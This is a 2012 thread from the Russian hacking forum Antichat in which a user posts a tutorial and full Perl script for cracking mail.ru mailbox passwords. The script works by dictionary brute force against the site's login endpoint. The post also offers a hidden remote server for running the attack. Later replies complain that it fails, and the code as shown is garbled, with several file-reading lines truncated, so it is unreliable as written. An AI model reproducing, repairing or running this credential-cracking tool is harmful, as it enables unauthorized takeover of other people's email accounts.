ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Взлом mail.ru - perl брут (https://forum.antichat.xyz/showthread.php?t=8051974)

tickhack 19.01.2012 01:00

Взломать аккаунт на mail.ru довольно просто, самый простой способ это перебор паролей по словарю)

Данный брут написан на языке Perl поэтому перед тем как читать дальше скачайте и установите Active Perl по адресу http://www.activestate.com/activeperl/

Сделано? Отлично...
Теперь создайте отдельную папку в которой будем создавать скрипт и создайте в этой папке пустые файлы перечисленные ниже:

code:

brute-mail.txt
mail.txt
pass.txt
log.txt

Теперь в файл mail.txt напишите встолбик адреса мыл на мэил ру которые необходимо ломануть
В файл pass.txt поместите словарь для брута - в столбик слова или цифры по которым будем подбирать.

Теперь в этой же папке создайте пустой текстовый файл и поместите в него код написанный ниже:

Код:

source:

Код:

#!/usr/bin/perl
use
LWP::UserAgent;
print
"########## GeNoM- mail.ru bruter v 1.3 ###############\n"
;
my
$ua = LWP::UserAgent->new(
max_size =>
1024
,
agent =>
'kakep brayzer v 9.1.1'
,
timeout =>
30
,
);
 
 
 
$set=
0
;
$setall=
0
;
open
email,
") {
$mails=~
s/\n//
;
# убираем символ конца строки
($login,$domain)=
split
(
/\@/
,$mails);
# разбираем мыло на логин и домен
if
($log==
1
){
open
logg,
">>log.txt"
;
print
logg
"-----Start brute-->$login\@$domain\n"
;
close
logg;}
open
pass,
"$login\@$domain\n\n"
;
open
logg,
">>log.txt"
;
print
logg
"\n-----Start brute-->$login\@$domain\n\n"
;
close
logg;
while
($password=) {
$password=~
s/\n//
;
# убираем символ конца строки
my
$req = HTTP::Request->new(
POST =>
'http://win.mail.ru/cgi-bin/auth'
);
$req->content(
"page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$password"
);
$req->referer(
'http://win.mail.ru/cgi-bin/auth'
);
my
$res = $ua->request($req);
$yda4a=$res->as_string;
if
($yda4a=~
m/500 Can't connect/
==
1
) {
print
"$yda4a\n"
;
exit
;}
# выводим текущее состояние брута
if
($set==$setting){$time=
localtime
;$time=
substr
($time,
4
,
15
);
print
"Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n"
;
open
logg,
">>log.txt"
;$time=
localtime
;$time=
substr
($time,
4
,
15
);
print
logg
"Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n"
;
close
logg;$set=
0
;}
if
($yda4a=~
m/checkcookie/
==
1
) {
print
"For $login\@$domain password->$password\n"
;
open
brut,
">>brute-mail.txt"
;
print
brut
"$login\@$domain password->$password\n"
;
close
brut;
open
logg,
">>log.txt"
;
print
logg
"For $login\@$domain password->$password\n"
;
close
logg;
goto
nashol;}   
 
$set++;   
$setall++;     
 
}
 
nashol:
close
pass;
}
close
email;


Переименуйте этот файл на mail-ru.pl

Все, брутфорс готов!
Двойным щелчком запустите mail-ru.pl и в появившемся окне наблюдайте за ходом бручения.
В файле log.txt будет фиксироваться отчет, а в файле brute-mail.txt будут появляться взломанные мыла.
вот дедик для брута только есть просьба не меняйте пароля создайте себе учётку и пользуйтесь
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

STALKER 20.01.2012 01:00

Понял! Это эффективно

tickhack 20.01.2012 01:00

если помог от + не откажусь !

tickhack 20.01.2012 01:00

Цитата:

Сообщение от Yorvet

Странно, у меня не получается. Решил проверить, в pass записал правильный один пароль для ящика, в mail сам адрес ящика, результат брута нулевой. Что я сделал не так?

а ты попробуй много пассов написать и в том числе правильный и проверь !

Chapchev 20.01.2012 01:00

Цитата:

Сообщение от tickhack

а ты попробуй много пассов написать и в том числе правильный и проверь !

Написал много паролей. Среди них правильный.
Ничего не происходит.
Гуды не видит.

Andorfin 20.01.2012 01:00

Шляпа весь этот брут я так понял,даже не ставил ничего,ждал отзывов

tickhack 20.01.2012 01:00

Цитата:

Сообщение от Andorfin

Шляпа весь этот брут я так понял,даже не ставил ничего,ждал отзывов

да ты просто пользоваться не умеешь !

STALKER 20.01.2012 01:00

прощу прощения а где взять это брут?

sibrik 20.01.2012 01:00

Как понять где взять?
Код весь написан же. Устанавливаешь на комп Perl, и делаешь всё как описано.
Или ты что-то другое имел ввиду?

nesquik 20.01.2012 01:00

Active Perl

как именно его запустить?


Время: 18:07